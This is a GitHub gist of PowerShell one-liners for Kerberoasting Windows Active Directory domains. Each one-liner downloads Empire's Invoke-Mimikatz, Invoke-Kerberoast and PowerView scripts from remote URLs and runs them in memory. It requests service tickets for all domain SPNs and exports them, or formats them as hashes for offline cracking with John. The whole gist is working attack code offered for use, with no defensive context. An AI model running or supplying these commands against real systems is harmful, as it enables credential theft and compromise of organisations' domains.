Created
March 16, 2020 14:01
-
-
Save OlivierLaflamme/db344da6f47df2f15ce017603708c26c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Invoke-Mimikatz.ps1 | |
| $urls = @("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; $domain=((Get-WmiObject Win32_ComputerSystem).Domain); Add-Type -AssemblyName System.IdentityModel; iex $("setspn.exe -T $domain -Q */*") | Select-String '^CN' -Context 0,1 |% {New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim()}; Invoke-Mimikatz -Command "`"kerberos::list /export`"" | |
| # Invoke-Kerberoast.ps1 | |
| $urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast | |
| # Invoke-Kerberoast.ps1 - Fix ':$krb5tgs$23$' | |
| # For output to John use: | |
| # | Out-File -Encoding UTF8 -Force hashes.txt | |
| $urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast -OutputFormat John | Select-Object -ExpandProperty Hash |% {$_.replace(':',':$krb5tgs$23$')} | |
| # Invoke-Kerberoast.ps1 - Machine not part of AD / custom credentials | |
| # Run this using: powershell -STA | |
| # This will not work in powershell_ise.exe! | |
| $domain="lab.test" ;$server="10.0.0.1"; $cred = (Get-Credential "user01@$domain"); $urls = @("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/situational_awareness/network/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast -OutputFormat John -Server $server -Domain $domain -Credential $cred | Select-Object -ExpandProperty Hash |% {$_.replace(':',':$krb5tgs$23$')} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment